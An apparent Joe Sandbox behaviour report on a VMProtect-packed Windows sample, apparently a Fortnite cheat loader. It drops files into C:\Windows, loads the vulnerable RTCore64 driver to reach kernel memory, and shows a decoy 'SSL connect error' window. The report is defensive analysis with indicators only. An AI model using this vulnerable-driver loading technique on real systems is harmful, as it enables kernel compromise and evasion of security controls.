Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC422900 RegCreateKeyW,RegSetKeyValueW,RegCloseKey,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,RegSetKeyValueW,RegCloseKey,RegCloseKey,GetModuleHandleA,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,RtlInitUnicodeString,NtLoadDriver,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z,??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC422900
Creates driver files
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Jump to behavior
Creates files inside the system directory
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\Vulnerability.exe Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys Jump to behavior
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\ Jump to behavior
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb Jump to behavior
Source: C:\Windows\Vulnerability.exe File created: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 Jump to behavior
Detected potential crypto function
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4145E0 4_2_00007FF7CC4145E0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC421630 4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC411330 4_2_00007FF7CC411330
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC413CE0 4_2_00007FF7CC413CE0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4172B0 4_2_00007FF7CC4172B0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC417EA0 4_2_00007FF7CC417EA0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4232C0 4_2_00007FF7CC4232C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 4_2_00007FF7CC423B60
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC41FBF0 4_2_00007FF7CC41FBF0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416810 4_2_00007FF7CC416810
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC415010 4_2_00007FF7CC415010
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC416440 4_2_00007FF7CC416440
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe 4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys 27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nULoYBmSWb 01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
Enables driver privileges
Source: C:\Windows\Vulnerability.exe Process token adjusted: Load Driver Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\Vulnerability.exe Code function: String function: 00007FF7CC41A3C0 appears 102 times
One or more processes crash
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Spawns drivers
Source: C:\Windows\Vulnerability.exe Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\nULoYBmSWb Jump to behavior
Source: nULoYBmSWb.4.dr Binary string: \Device\PhysicalMemory
Source: driverfo.sys.0.dr Binary string: \Device\{83040329-923773830}
Source: nULoYBmSWb.4.dr Binary string: 0\DosDevices\RTCore64\Device\RTCore64
Source: classification engine Classification label: mal100.expl.evad.winEXE@27/9@1/3
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Jump to behavior
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Windows\Vulnerability.exe File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: lUAc7lqa56.exe ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe Virustotal: Detection: 29%
Source: unknown Process created: C:\Users\user\Desktop\lUAc7lqa56.exe "C:\Users\user\Desktop\lUAc7lqa56.exe"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
Source: C:\Windows\Vulnerability.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\certutil.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\ Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil" Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: d3d9.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Vulnerability.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: certca.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\certutil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: lUAc7lqa56.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: lUAc7lqa56.exe Static file information: File size 6062592 > 1048576
Source: lUAc7lqa56.exe Static PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x5c7a00
Source: lUAc7lqa56.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
